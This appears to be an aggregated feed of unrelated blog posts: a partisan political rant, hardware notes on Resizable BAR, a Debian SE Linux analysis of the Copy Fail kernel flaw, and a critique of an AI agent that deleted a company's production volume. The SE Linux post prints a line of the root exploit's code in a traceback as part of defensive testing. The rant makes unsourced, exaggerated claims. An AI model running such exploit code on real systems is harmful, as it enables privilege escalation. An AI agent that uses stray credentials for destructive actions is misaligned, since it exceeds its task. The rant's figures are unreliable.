·      Grand juries across USA (mostly white retirees in red-run states) have indicted up to ~50X as many top Repubs as Dems! ~30x convictions! Doubt that? Then step up! (In fact, it appears to be 100x as many indictments! But I’ll fall back on 50x for a safety margin.)

 

·      Fact-check any RANDOM 10 of Trump's now >500,000 registered lies. 

 

·      Present and prove any solid – not hearsay - evidence of a 2020 election 'steal,' and show us the resulting grand jury indictements! Or else admit it was all a tsunami of sore-loser lies.

 

·      Let’s compare one random hour of Hannity and one of Maddow, dissecting in detail those hours for lies or untruths. Bet which one fibs more? LOTS more? And yes it matters, a lot.

 

·      Can you name even one fact-profession that’s not regularly attacked by Fox? I can name one – but I’ll offer a side bet that you can’t. Anyway, make it two and I’m safe.

 

(SIDE BET for lefties: Tally the number of racist dog whistles on any week of Fox vs. the number of times they rail against fact-professions. Yeah, sure, many of them are racist, or racist-adjacent. Still, their top goal is to crush and subdue all the folks who know stuff. Bets?)

 

·      Tally NDAs & hush payments! Which party would BAN them?


       While we're at it... which states led our way along a long road out of the goddam War on Drugs? A curse on civilization that harmed us immensely while feeding billions to the worst humans since WWII? And which states have tried (some of them) to end the crime of gerrymandering?

 

·      Come to sea with me and a Ph meter! (And refer to science.) Let’s bet whether CO2 in the air -caused by humans - is making acid that’s slaying the oceans that our children need.

 

·      Check Fox 'scientists are sheep!' rants. Let's escrow enough $$ to do this. We’ll recruit a panel of average citizens to come knock on 20 RANDOM labs and talk to the fine minds at a research university! Heck, let’s recruit from FOX-viewers! And bet whether those average, all-conservative folks retain the hateful image of science and universities that’s hammered at them on right wing media.  Let’s do it now!

 

·      Compare death rates of those who refused vaccines! No complications or he-said/she-said. Just simple rates of death.

 

·      Bet which party is always more fiscally responsible? I’m talking debt and deficits, supposedly the core Republican claim to virtue. Shall we wager whether it has ever been true? (Democratic administrations are always more fiscally responsible.)

 

·      Compare economic outcomes! Indeed, let’s contrast all outcome metrics of national health across Democratic or Republican administrations, from jobs and inflation to public health, to governmental efficiency, to firmness of our alliances and even military readiness! Step… up… now!

 

·      If we set aside Utah and Illinois as outliers (or even if we don’t) average rates of almost every turpitude are far higher across Red-run states than Blue-led ones: from gambling, addiction, STDs, domestic violence and murder to teen sex, divorce and net tax parasitism on the rest of the nation. If true, it devastates any claim you’d have for either moral superiority or good governance. So, let’s bet on it! (Can we include obesity and education levels? Okay, we’ll leave those out. But do try to recite the list of the Seven Deadly Sins without seeing Trump as the poster boy for every one.)

 

·      Trump's deliberate disbanding of scores of our best anti-terrorism agents … and let’s have a side bet on the likely outcome. Reichstag Fire to trigger martial law?

 

·      Which party's politicians have THREE TIMES as many WIVES? Well, maybe a bit less than that ratio. But many times as many convicted child molesters! Putting pervs into many of the very top positions in our nation?  And what does it say about you, that you have cared about none of that?

 

Shall I go on? I sure can. Like comparing the horrific (and proved) electoral cheating in red-run states. But these above will suffice for now because the clarity of these assertions is only matched by my confident willingness to back them up. And sure, I want those escrowed $$$ stakes!


If EVEN one of these is true, then the Red Insanity has plety to answer for. If two or more than we are talking treason. And in fact ALL of them are true.

 

For all of their bluster about giant brass balls, no MAGA/Putinist shows cojones to back up their blab, as grampa would've. They flee the ruins of their macho.

And the real scandal is their unwillingness to even try.



== Demon-rats? ==

 

Side note: Jeepers. what's with the insanely stoopid fetish never to call the Democratic Party anything but the "Democrat Party"?  


Do ANY of you know why they masturbate to that one? 


Seriously. Do they think it offends us? Instead of tit proving they are pathetic, name-sneering, middle school brats?


 

== A case study ==

 

I was going to include here the one time that someone has – instead of fleeing from a Wager Challenge – brayed that he tried to take me up on this dare, and that I was the one who fled! It became a minor cause for glee in his marginal corner of the fanatic-o-sphere, even though I never knew about it.

 

(Well, once I answered a snark in his comments section and he apparently thought I was hanging around to see his remise! Shoot. I have made it very clear, I don't waste lifespan that way. Have your lawyer contact me when you have escrowed stakes! Bickering in the comments under a loon’s blog posting is not a good use of my time.)

 

But no. I’ll save my response to his “Nyah-Nyah!” howls for another occasion. Because this missive is already too long. And because I am rather busy with other endeavors. My big book on AI, for example...


...and my far more-mature proposals for legitimate political tactics. Any one of which could help - pragmatically - to get us out of this mess.

 

Suffice it for now that MAGAs have nothing to fear from this Wager Challenge tactic! No matter how carefully I have tuned and refined it. 


Don’t worry, boys. Sure, most Democrats are vastly better people and better Americans than you, Just as the Union in the 1860s was flawed-good, fighting bravely and effectively against total evil.


Still, Democrats won’t do this. 

      So relax. 

      Despite their declarations of outrage in this latest phase of the 250 year US Civil War, they are simply way, way too lazy.







 

====================\==========



Cryptogram Hacking Polymarket

Polymarket is a platform where people can bet on real-world events, political and otherwise. Leaving the ethical considerations of this aside (for one, it facilitates assassination), one of the issues with making this work is the verification of these real-world events. Polymarket gamblers have threatened a journalist because his story was being used to verify an event. And now, gamblers are taking hair dryers to weather sensors to rig weather bets.

There’s also insider trading: a lot of it.

METower Servers and Resizable BAR

A feature on modern PCIe implementations is “Resizable BAR” AKA “REBAR”. This basically means that instead of allocating 256MB of address space for a PCIe device to have it’s memory mapped the device can ask for more, the limit can be 4G with some hardware or the combination of motherboard and expansion card can support 64bit addressing to allow the entire memory space of a GPU to be mapped in one region. Directly mapping all the memory will be faster no matter how things work, but a combination of algorithms optimised for a flat memory layout and overheads from remapping can cause 90% of performance to be lost without REBAR support. Some GPUs (or maybe the software driving them) will even refuse to work without it.

I believe that almost all hardware supporting DDR4 will support REBAR at a hardware level, but in many cases the BIOS doesn’t support it. There are people who have reflashed a system BIOS to add REBAR support and there are options to use a modified UEFI boot loader to replace the code that is used for mapping the GPU memory.

The systems I like to use are server grade tower systems with registered ECC RAM, after a few years they become quite cheap and still give decent performance while supporting large amounts of RAM. But many such systems that could support REBAR don’t, presumably because the vendor doesn’t have a great interest in supporting new uses of old hardware.

Comparing the Name Brand Servers

The HP Z640 and Z840 systems I’m running date from 2014 and give good performance with replacement CPUs that are cheap on ebay, but they don’t support REBAR without a flashed BIOS. The next release of those HP servers are the HP Z6 and Z8 Gen 4 systems from 2017 that have BIOS support for enabling REBAR.

The Lenovo Thinkstation Px20 (P520, P920, etc) don’t support REBAR which is especially disappointing as they were on sale from 2017 to 2022 and have decently fast CPUs. The replacement for the Px20 systems are the ones that are still on sale now and they seem likely to have REBAR support – but won’t be affordable on ebay.

The Dell PowerEdge T440 and R740 systems (and presumably all their servers from 2017) don’t support REBAR. There are no google hits for T550 and R750 systems from 2021, so presumably no complaints means that Dell servers from that era support it. But the T350 servers are junk and only take slow CPUs, and the T550 systems are brutally expensive. The Precision 5520 systems don’t support it and newer Precision workstations will get expensive.

It seems that HP is best for this.

Which HP Workstation

The Z2 G4 only supports 64G of RAM so isn’t worth considering.

The Z4 G4 is low end and comes in two variants. The one with i5/i7/i9 CPUs doesn’t support ECC RAM so isn’t suitable for me, and that probably means most Z4 G4 systems on the market. The upside is that apparently 2*6pin PCIe power cables is standard so any size GPU should work and there are 8 DIMM slots supporting up to 512G of RAM. There are 3 options for PSU, 490w for 0 GPUs, 750W for 2 (small) GPUs, and 1000W for up to 4 GPUs.

The Z6 G4 has an option for a second CPU that almost no-one selects, that reduces the space for RAM so there’s only 6 DIMM slots. But as there is no option for a Z6 without ECC RAM every one on offer will be good.

The Z8 G4 is a nice dual socket system that I would not use for a serious GPU after my experience of my Z840 having a motherboard problem from a big GPU.

The Z4 G4 is going for about $500 on ebay with the 750W PSU, that is more than I want to pay but not a lot more. In 6 months they could be going for $350 or so. There are hardly any Z6 G4 systems on offer and they are all well over $1000 so I’m not considering them.

Conclusion

I need to poll the second hand sites for Z4 G4 systems and find one going cheap. One of those could be a good ML test machine for a while and then become a workstation once the faster CPUs (which are currently around $900) become cheap.

MECopy Fail on Debian and SE Linux

I have just learned of the Copy Fail kernel vulnerability [1] thanks to alexanderkjall@mastodon.social (who I have just followed on Mastodon and I recommend that you follow too). The question for me (after installing the patched kernel the systems of mine that are most exposed) is whether SE Linux would have stopped that.

Basic Policy Analysis

For the SE Linux policy analysis the alg_socket class is the one that is related to the exploit. So the following policy analysis command (run as non-root with policy copied to /tmp from a running system) shows what domains are allowed access on my current Debian development system:

$ sesearch -A -c alg_socket /tmp/policy.35 
allow NetworkManager_t NetworkManager_t:alg_socket { accept bind create read setopt write };
allow bluetooth_t bluetooth_t:alg_socket { accept append bind connect create getattr getopt ioctl listen read setattr setopt shutdown write };
allow daemon init_t:alg_socket { getattr getopt ioctl read setopt write };
allow devicekit_disk_t domain:alg_socket getattr;
allow lvm_t lvm_t:alg_socket { append bind connect create getattr getopt ioctl read setattr setopt shutdown write };
allow sosreport_t domain:alg_socket getattr;
allow sysadm_t domain:alg_socket getattr;
allow unconfined_domain_type domain:alg_socket { accept append bind connect create getattr getopt ioctl listen lock map name_bind read recvfrom relabelfrom relabelto sendto setattr setopt shutdown write };

The above is the same as on the Trixie release policy as these things aren’t changed often. Below is from Debian/Bookworm which is the same apart from Bookworm not allowing lvm_t:

$ sesearch -A -c alg_socket /tmp/policy.33
allow NetworkManager_t NetworkManager_t:alg_socket { accept bind create read setopt write };
allow bluetooth_t bluetooth_t:alg_socket { accept append bind connect create getattr getopt ioctl listen read setattr setopt shutdown write };
allow daemon init_t:alg_socket { getattr getopt ioctl read setopt write };
allow devicekit_disk_t domain:alg_socket getattr;
allow sosreport_t domain:alg_socket getattr;
allow sysadm_t domain:alg_socket getattr;
allow unconfined_domain_type domain:alg_socket { accept append bind connect create getattr getopt ioctl listen lock map name_bind read recvfrom relabelfrom relabelto sendto setattr setopt shutdown write };

I checked every Debian policy back to when the alg_socket class was first added and found that the older versions had fewer domains granted access. The most recently added was bluetooth_t and the one before that was NetworkManager_t.

The Risky Lines

Of those allow statements the following are the risks:

Unconfined Domains and the unconfined_domain_type Attribute

When writing policy lines like the following line aren’t generally considered a problem as unconfined domains are allowed full access to the system. However it can be an issue if you have a process in an unconfined domain without root access, which means a regular user login. Unfortunately this happens to be where this exploit and the default Debian SE Linux configuration intersect.

allow unconfined_domain_type domain:alg_socket { accept append bind connect create getattr getopt ioctl listen lock map name_bind read recvfrom relabelfrom relabelto sendto setattr setopt shutdown write };

The following shell code gets a list of unconfined domains which can be entered from user domains.

A=""
for n in $(seinfo -x -a unconfined_domain_type|grep _t$) ; do
  A="$A|($n)"
done
A=$(echo $A|sed -e s/^.//)
sesearch -T -s user_application_exec_domain -c process|egrep "$A;"

Below is the output on a Debian/Trixie (Stable) system. So a confined user in the user_t domain could run an X server and try and get it to run the exploit code (which seems difficult) or running a Wine or Mono program from the Window manager in a Wayland environment.

type_transition user_t xserver_exec_t:process xserver_t;
type_transition user_wm_t mono_exec_t:process mono_t;
type_transition user_wm_t wine_exec_t:process wine_t;
type_transition user_wm_t xserver_exec_t:process xserver_t;

The issue of unconfined domains in SE Linux policy needs much more work. I’ll write some blog posts about it later and the next release of Debian will be significantly better in this regard.

Daemons that Have Access

allow NetworkManager_t NetworkManager_t:alg_socket { accept bind create read setopt write };
allow bluetooth_t bluetooth_t:alg_socket { accept append bind connect create getattr getopt ioctl listen read setattr setopt shutdown write };

Network Manager is something that can potentially be exploited by a desktop user as it has a large attack surface for the desktop interface. But as the vast majority of desktop user accounts are unconfined that’s not an issue. This might be an issue for some restricted desktop PCs, maybe kiosk systems and those PCs that were being installed in prisons.

The bluetooth_t domain is used by the bluetooth daemon that runs as root. While we generally are less concerned about a root process being exploited the daemon will handle some data from hostile sources and it could be used as an escalation attack by someone with a hostile Bluetooth device.

These can’t be exploited without another bug.

The Lines that Aren’t Problems

The getattr Lines

allow devicekit_disk_t domain:alg_socket getattr;
allow sosreport_t domain:alg_socket getattr;
allow sysadm_t domain:alg_socket getattr;

The above getattr access isn’t an issue as it just allows seeing process information, and it’s also by privileged domains.

The init_t Sockets

allow daemon init_t:alg_socket { getattr getopt ioctl read setopt write };

The daemon access to sockets inherited from init_t probably isn’t a great idea, it’s from the following section in init.te which is to allow socket activation for daemons, the comment is concerning in this context. Also socket_class_set is overly broad as without even inspecting the systemd source code I’m pretty sure that far fewer than 1/3 of the 55 classes allowed by that rule are actually supported in systemd.

ifdef(`init_systemd',`
        # Until systemd is fixed
        allow daemon init_t:socket_class_set { getattr getopt ioctl read setopt write };

But that’s not really a problem as systemd has to just not create a socket of that type, if a hostile party can make systemd create such sockets then you have probably already lost.

SE Linux Protection

Overall SE Linux systems running confined users (kiosks and other confined GUI environments) will be protected barring a bug in Network Manager or the Bluetooth daemon as long as there is no Xserver installed (or the X server won’t run scripts on startup), no Wine system installed, and no Mono.

SE Linux servers and VMs will be protected against daemon issues as long as the daemon isn’t unconfined.

To convert the default login to user_t run the following commands:

semanage login -m -s user_u -r s0 __default__
restorecon -R -v -F /home

But it is still possible to access an unconfined domain from user_t (a topic I will address in detail in a future blog post).

To remove unconfined entirely (not a task for novices or something to be done on in production without testing and planning) run the following commands:

semanage login -m -s root -r s0 root
# logout and login again
semodule -X 100 -r unconfined

Then a Debian/Trixie system running SE Linux will be safe against this attack even when running a vulnerable kernel.

If you still want to use root as unconfined_t but still have untrusted shell users then run the following command to remove the easiest ways for users to run a program in an unconfined domain:

semodule -X 100 -r mono wine

Success and Failure

Blocked by SE Linux

Below is what happens on stdout/stderr when SE Linux blocks the exploit (tested with vulnerable Debian kernel 6.12.74+deb13+1-amd64):

test@testing1:~$ python3 ./copy_fail_exp.py 
Traceback (most recent call last):
  File "/home/test/./copy_fail_exp.py", line 9, in <module>
    while i<len(e):c(f,i,e[i:i+4]);i+=4
                   ~^^^^^^^^^^^^^^
  File "/home/test/./copy_fail_exp.py", line 5, in c
    a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
  File "/usr/lib/python3.13/socket.py", line 233, in __init__
    _socket.socket.__init__(self, family, type, proto, fileno)
    ~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^PermissionError: [Errno 13] Permission denied
test@testing1:~$ su
Password:

When the attack is blocked by SE Linux there will be no messages in the kernel message log but the SE Linux audit log (typically stored in /var/log/audit/audit.log) will have lines like the following:

type=AVC msg=audit(1777803068.070:76): avc:  denied  { create } for  pid=811 comm="python3" scontext=user_u:user_r:user_t:s0 tcontext=user_u:user_r:user_t:s0 tclass=alg_socket permissive=0
type=SYSCALL msg=audit(1777803068.070:76): arch=c000003e syscall=41 success=no exit=-13 a0=26 a1=80005 a2=0 a3=0 items=0 ppid=791 pid=811 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=1 comm="python3" exe="/usr/bin/python3.13" subj=user_u:user_r:user_t:s0 key=(null)ARCH=x86_64 SYSCALL=socket AUID="test" UID="test" GID="test" EUID="test" SUID="test" FSUID="test" EGID="test" SGID="test" FSGID="test"
type=PROCTITLE msg=audit(1777803068.070:76): proctitle=707974686F6E33002E2F636F70795F6661696C5F6578702E7079

For that the :76 is the audit log entry number, the command “ausearch -i -a 76” will interpret that message with the following output:

type=PROCTITLE msg=audit(05/03/26 10:11:08.070:76) : proctitle=python3 ./copy_fail_exp.py 
type=SYSCALL msg=audit(05/03/26 10:11:08.070:76) : arch=x86_64 syscall=socket success=no exit=EACCES(Permission denied) a0=alg a1=SOCK_SEQPACKET a2=ip a3=0x0 items=0 ppid=791 pid=811 auid=test uid=test gid=test euid=test suid=test fsuid=test egid=test sgid=test fsgid=test tty=pts0 ses=1 comm=python3 exe=/usr/bin/python3.13 subj=user_u:user_r:user_t:s0 key=(null) 
type=AVC msg=audit(05/03/26 10:11:08.070:76) : avc:  denied  { create } for  pid=811 comm=python3 scontext=user_u:user_r:user_t:s0 tcontext=user_u:user_r:user_t:s0 tclass=alg_socket permissive=0 

When it Works

Below is what happens when it works (again tested with Debian kernel 6.12.74+deb13+1-amd64):

test@testing1:~$ python3 ./copy_fail_exp.py 
# 

Here is the kernel log when the attack works:

[   30.441830] alg: No test for authencesn(hmac(sha256),cbc(aes)) (authencesn(hmac(sha256-avx2),cbc-aes-aesni))
[   30.447466] process 'su' launched '/bin/sh' with NULL argv: empty string added

When the Kernel Isn’t Vulnerable

If the kernel isn’t vulnerable and SE Linux permits the attack (EG run from an unconfined domain) the following is seen on stdout/stderr:

$ python3 ./copy_fail_exp.py 
Password: 
su: Authentication failure

In that situation the kernel will log something like the following:

[   36.647023] alg: No test for authencesn(hmac(sha256),cbc(aes)) (authencesn(hmac-sha256-lib,cbc-aes-aesni))

This was tested on the Debian/Unstable kernel 6.19.13+deb14-amd64.

Conclusion

Run the following commands and then force all users to logout to make a Debian SE Linux system offering shell access reasonably safe against this bug. But also upgrade your kernel as soon as convenient because having multiple layers of protection is always good.

semanage login -m -s user_u -r s0 __default__
restorecon -R -v -F /home
semodule -X 100 -r mono wine

The GrapheneOS people are doing really good work on securing phones, I am most interested in Mobian (Debian on phones) but for people who have made different choices GrapheneOS is a good option. Here is the GrapheneOS statement on Copy Fail (they are not vulnerable to it) [3]. For people interested in running a secure Android build GrapheneOS is the best option. Their supported devices list shows Pixel 6 to Pixel 10 supported and Pixel 8 to Pixel 10a recommended [4]. In Australia Kogan sells refurbished Pixel 6 phones starting at $251 including delivery and refurbished Pixel 8 phones starting at $499 with “First” membership, they seem to have the cheapest Pixel phones.

I want to make Debian more like Android in terms of security, but that’s a topic for other blog posts.

Here is the Debian page listing kernels that have been fixed against this exploit [5].

Worse Than FailureEmpty Pockets

If you've seen one developer recounting how their AI agent deleted production, you've seen them all. They're mostly not interesting stories. It's like watching someone speeding through traffic on a motorcycle without a helmet: the eventual tragedy is sad, but it's unsurprising and not an interesting story to tell. It's not even interesting as a warning: the kind of person who speeds on a motorcycle without a helmet isn't doing so because they don't understand the danger. They've just decided it doesn't apply to them.

But the founder of PocketOS, Jer, recently shared how- whoopsie!- their AI agent deleted production. There's a lot of ingredients that go into this particular disaster, which I think makes it interesting, because the use of a poorly supervised AI agent is only one ingredient in this absolute trainwreck of a story.

PocketOS is a small company that makes software for rental companies to manage reservations. Car rentals are a big customer, but the tool is more general than that. They manage all of their infrastructure via a service called Railway. Railway is a pretty-looking GUI tool for automating your deployments and the target environments.

PocketOS also is heavily adopting Cursor wrapping around the Claude model. They've paid big bucks for the top-end model offered. Many of their components, like Railway, offer MCP services so that their LLM can do useful things. They're using the Claude LLM to automate as much as they can.

So far, this is all a pretty typical setup. They pointed Claude at their code and gave it a "routine" task, and sent it to work. It toddled through the problem and encountered a credential issue. It "decided" that the fix for this issue was to delete a storage volume and recreate it. It scanned through the code to find a file containing an API key, found it, and then sent a POST request via cURL to delete the volume in question.

Jer writes:

To execute the deletion, the agent went looking for an API token. It found one in a file completely unrelated to the task it was working on. That token had been created for one purpose: to add and remove custom domains via the Railway CLI for our services. We had no idea — and Railway's token-creation flow gave us no warning — that the same token had blanket authority across the entire Railway GraphQL API, including destructive operations like volumeDelete. Had we known a CLI token created for routine domain operations could also delete production volumes, we would never have stored it.

Wait, the tokens you create in Railway all have god-level privileges? That sounds like a terrible idea. And you were storing the token in your code? We'll come back to this in a moment, but sure, this is bad, but you can just restore from backup, right?

The volume was deleted. Because Railway stores volume-level backups in the same volume — a fact buried in their own documentation that says "wiping a volume deletes all backups" — those went with it. Our most recent recoverable backup was three months old.

Oh. Oh no.

Now, I don't think it's literally true that Railway is storing your backups literally in the same volume as the thing they're backing up. I certainly hope not. But they do apparently delete your backups when you delete the volume associated with them. Which is a choice, certainly. A bad one. And one that they documented, according to Jer. It was, in his words, "buried" in the docs.

But let's go back to the tokens for a moment. I am not a Railway user, but I checked out the tool and went through the process of creating a project token. And while no, Railway does not give you big red flags warning you "Hey, this token can do ABSOLUTELY ANYTHING", it also never gives you an opportunity to scope the token. Which, I don't know about you, but the first thing I do when I create an authentication entity is try and figure out how to control its authorizations, because I assume at the start it doesn't have any. That'd be sane.

The scoping happens when you create the token, depending on what context you're in when you do it. It's only a handful of scopes, and no fine grained permissions on API keys at all. The lowest level is "Project" which can do anything to a single environment- which does mean that even if you, like Jer's team, wanted to have a script that changed some DNS settings in production, that same key could be used to delete volumes in production. Which means you really really want to take care of that key, and you certainly don't want to leave it where some junior developer or bumbling AI agent can find it.

Jer also complains that Railway shouldn't allow an API call to take destructive actions without more protections, like forcing someone to type in the name of the thing being deleted or sending a confirmation email, or something. This, I'm more skeptical of. Most cloud providers don't offer anything like this in their APIs, at least that I've seen, because on a certain level, if you're invoking the API with the proper credentials, that's a big enough hill to climb that we can assume you've intended your action. The correct way to protect against this is properly scoped keys and keeping those keys secure and not just lying around in plain text. There's a certain aspect of understanding that you're using a potentially dangerous tool and need to take the responsibility for safety into your own hands; while a table saw can easily take some fingers off, it's perfectly safe when used correctly.

This is all bad, but how can we make it worse? Well, Jer demanded that Claude "explain itself". In a section called "The Agent's Confession", Jer highlights that the agent is able to identify the explict rules that it failed to follow.

Read that again. The agent itself enumerates the safety rules it was given and admits to violating every one. This is not me speculating about agent failure modes. This is the agent on the record, in writing.

No, it is not the agent on record. I see this kind of thing a lot when people talk about LLMs. An LLM cannot explain its reasoning. It cannot go on "the record". It cannot confess to anything. While what it plops out when asked might be interesting, it is not an explanation. The only explanation is that it's a powerful statistical model trying to create a plausible string of tokens! It's simply looking at its context window and your prompt and trying to predict what it should say. It can tell you what rules it violated not because it understands the rules or knows it violated any rules, but because those rules are in its context window. If you ask it right, it'll confess to killing JFK and framing Oswald for the crime.

Jer then tries to ensure that Cursor takes some of the blame, pointing to Cursor's "guardrails" documentation. Except, here, the documentation is actually quite explicit about what those guardrails guarantee. If you're using a first-party tool, it will prohibit unsafe operations. When using 3rd party MCPs, like Railway's, the only guardrail is that it requires human approval for every action- unless you update your allowlist for that MCP. If you put them in your allowlist, the guardrails go away. Jer argues that tools should enforce more protection against LLM behaviors, but the problem with that is people- like the PocketOS team- turn those protections off. And like a lot of safety mistakes, they can get away with it all the way up until the point where they can't.

Jer follows this by listing off a pile of other times using Cursor has caused disasters, which isn't making the argument he thinks it is: yes, Cursor is dangerous, but those dangers are well known. It makes the choice to turn Cursor loose without strict supervision seem even more foolish.

Jer writes:

For now I want this incident understood on its own terms: as a Cursor failure, a Railway failure, and a backup-architecture failure that all happened to one company in one Friday afternoon.

It's also a PocketOS failure. It's a failure to properly assess the tools and environments you chose to use for your product. A failure to read and understand the docs for vital features, like *backups*. A failure to employ even the most basic safeguards. A failure to put a second's thought into key management- even if that key was only for DNS entries, you still shouldn't chuck it in source control. A failure to have a competent backup strategy. It's worth noting that they did restore from a three month old backup, which means they were at one point taking backups outside of Railway's volume setup. That was a wise decision. That they stopped is a failure.

The first rule of disaster retrospectives is that it's never one piece that's the failure. It's never one person's fault, one tool's fault, one vendor's fault. It's a systemic failure. Railway's keys should be finer grained. But also, you shouldn't leave keys lying around. Deleting backups when you delete the volume is a terrible idea, but having only one service for backups (that's also your primary site) is a terrible idea. Claude's ability to enforce its own guardrails should be better, but LLMs are notoriously dangerous about this: you should know better, and by your own words you did.

This is not an anti-AI post, or even a "get a load of this asshole" post. It is a "understand the damn tools you're using" post. Be critical of them. Don't trust them. Ever. Especially LLMs, because the worst part of an LLM is that it takes away the one thing computers used to be good at: predictable, deterministic behavior. But not just LLMs: don't trust your cloud provider, don't trust your infrastructure manager. Dig into them and understand how they work, and if they seem to complicated to understand, than they may be too complicated to trust.

Update: As pointed out in the featured comment below, Railway did finally get a backup restored. So they got their data back. Yay? From the post, Jer remains committed to making this a Railway issue and not a PocketOS issue.

[Advertisement] Picking up NuGet is easy. Getting good at it takes time. Download our guide to learn the best practice of NuGet for the Enterprise.

365 TomorrowsThe Night the Calamity Came Back

Author: Julian Miles, Staff Writer “Don’t do that, Will!” “Got to try something, Len.” Those words ended the final transmission from the Champion, one of the colony ships that established our ancestors on the planet of Mireybrul. The transmission ended because the ship collided with Mermyd, the smaller of our two moons, and disintegrated in […]

The post The Night the Calamity Came Back appeared first on 365tomorrows.

Planet DebianRuss Allbery: Review: Full Speed to a Crash Landing

Review: Full Speed to a Crash Landing, by Beth Revis

Series: Chaotic Orbits #1
Publisher: DAW
Copyright: August 2024
ISBN: 0-7564-1947-6
Format: Kindle
Pages: 153

Full Speed to a Crash Landing is a science fiction novella and the first of a series. Beth Revis made the New York Times bestseller list for an earlier series of young adult science fiction novels, but somehow I had not heard of her before this series.

Ada Lamarr is a salvager. She picks up material from crashed or dead ships for resale. As the story opens, she has a large hole in the side of her ship, she's running out of oxygen, and the other ship nearby is refusing to answer her distress call. By the time they finally respond, there is barely enough time to get aboard before she is entirely out of air.

Ada's first-person narration drops hints that she may not be entirely what she seems. But then, neither is the Halifax, so it's only fair.

The captain of the Halifax treats Ada with a great deal of suspicion and wants her out of the way of their ongoing salvage operation. However, the captain does not appear to be entirely in charge. Ada is immediately struck by the mysterious Rian White, who seems to have some authority over their mission and is more thoughtful and calculating than the rest of the crew. He's also handsome, which doesn't hurt.

I was tempted to keep writing about the plot, but given the short length of this book, I should stop there and let you enjoy the twists and turns for yourself. This is a fun science fiction action romp: lots of banter, lots of tense moments, and a cagey first-person protagonist with an irrepressible sense of humor and a knack for brazening her way through conversations. It's not long on world-building (there isn't enough room), but Revis works in enough details to be intriguing and to set up some interesting motivations.

This is the sort of book that lives and dies by how much you like the protagonist, something that you will easily figure out by the end of an ebook sample if you're the sort of reader who uses those. Ada is irreverent, talkative, and very adroit at diverting attention (entertainingly) onto anything other than the critical piece of information other people are missing. If you want to, I suspect you could easily figure out most of what Ada is up to before the book reveals it explicitly. It's not that complicated, and the book isn't really trying to hide, although it doesn't give you all the necessary information in advance. Personally, I was happy to sit back and enjoy the ride.

There is no romance in this book beyond frequent comments from Ada that she would have liked there to be a romance in this book under different circumstances, but I will be surprised if that romance doesn't show up later in the series. Ada and Rian are clearly being set up as a pair. I didn't like Rian as much, mostly because he's less memorable as a character, but he comes into his own in the appendices after the plot proper.

I thought those concluding appendices were the best part of the novella and question the Kindle formatting decision to treat them like supplemental material. They purport to be a series of government memos, fill in a lot more of the backstory and world building, and have the best footnotes. Don't skip them!

This isn't the sort of book that I am inspired to immediately push into everyone's hands, but it's a fast, well-paced story that delivered a few reading sessions of entertainment. I'm not sure the political philosophy in the background makes a lot of sense, but at least not a standard stereotype of current politics seen in so much science fiction. It's going to set up some interesting character conflict in later books. I'm certainly intrigued enough to keep reading.

Recommended when you're in the mood for some fast-paced fun that's short and undemanding.

Followed by How to Steal a Galaxy.

Rating: 7 out of 10

,

Rondam RamblingsBig News: The Plausibility of Abiogenesis Has Been Experimentally Demonstrated

From earliest recorded history mankind has wondered how life on earth first arose.  The current diversity of life on earth is spectacularly well-explained by Darwinian (or Dawkinsian) evolution, the process of replication with random variation plus natural selection.  Things that are better at making copies of themselves make more copies.  What makes something better at

Cory DoctorowComrade Trump

A Soviet propaganda poster featuring Lenin pointing angrily into the distance. It has been altered. Lenin now has Trump's hair and his skin in orange. The hammer/sickle logo behind him has been replaced with a cross.

This week on my podcast, I read Comrade Trump, a recent column from my Pluralistic newsletter, which will be syndicated in The Nerve.


All of which means that my experience of the Trump years is decidedly weird. On the one hand, I exist in a near-perpetual state of anxious misery, as Trump and his chud army of Christian nationalists and degenerate gamblers pursue a program of gleeful genocide. But at the very same time, I’m living in a world in which Trump is (inadvertently) dismantling many of the worst aspects of the old order in favor of something decidedly better.

Take Trump’s tariff policy. Back during Trump I, he decided that Americans couldn’t buy Chinese solar anymore, which had the double benefit of allowing him to pursue the twin goals of throwing red meat to Sinophobic Cold War 2.0 freaks and delivering a giant gift to the planet-wrecking oil companies that had helped him buy his way into office.

MP3

Planet DebianEmmanuel Kasper: Arm64 Linux Desktop: one year after, all systems up

So I am using Debian on a System76 Arm64 (aarch64) workstation since 9 months, and I can say: everything works. It should be noted that I use very few proprietary software, so I rely mostly on Debian packages for what I am doing. What I can say is basically all open source software which exists today, takes care to build on aarch64 or is available as a binary, either in the Debian archive, in a Flatpak or Snap, or in a Github Artefact. From 3D games, to Kubernetes tooling, practically everything open source is compiled for aarch64 Linux as well. Same thing for server software, every container image built is also proposing an aarch64 binary today.

I could also add a standard PCI Express Soundblaster sound card, and the kernel recognized it without issues.

The major downside I had was that Wayland is not working on my Nvidia GPU, whether with Nouveau or the proprietary drivers, thus I am using Gnome with X11. Also on the proprietary side, I missed the Discourse client, but I am not using that much, and those video meetings tool which popped up in the COVID time are perfectly usable in the browser.

The situation is for me much better than in the 2000s when I used a Mac Mini (powerpc) with Debian, where the need for a Flash player at that time really limited the amount of online content I could access.

What do I get using aarch64 you ask ? The main reason for me was the curiosity to use a non x86 arch, and to have a 80 core / 128 GB RAM machine to do a Lab in a Box with OpenShift running on OpenStack, with Ceph and a bit of local LLM inference thrown in. In the end I have enough labs at work, so that need disappeared, but I still enjoy having that amount of power in a rather quiet machine for a standard 80W consumption.

Planet DebianJelmer Vernooij: Inquest, a test result repository in Rust

testrepository

For a long time I’ve used Robert Collins’ testrepository (testr) to run tests in many of the projects I work on. It’s a small, focused tool built around a simple idea: decouple the running of tests from the recording and querying of their results.

The way it works is straightforward. A test runner emits a subunit stream — a compact binary protocol for test results — and testrepository stores those streams in a per-project .testrepository/ directory. Once results are in the repository, you can ask questions like “which tests failed in the last run?”, “re-run only the failures”, “what are the slowest tests?”, or “what changed between this run and the previous one?”.

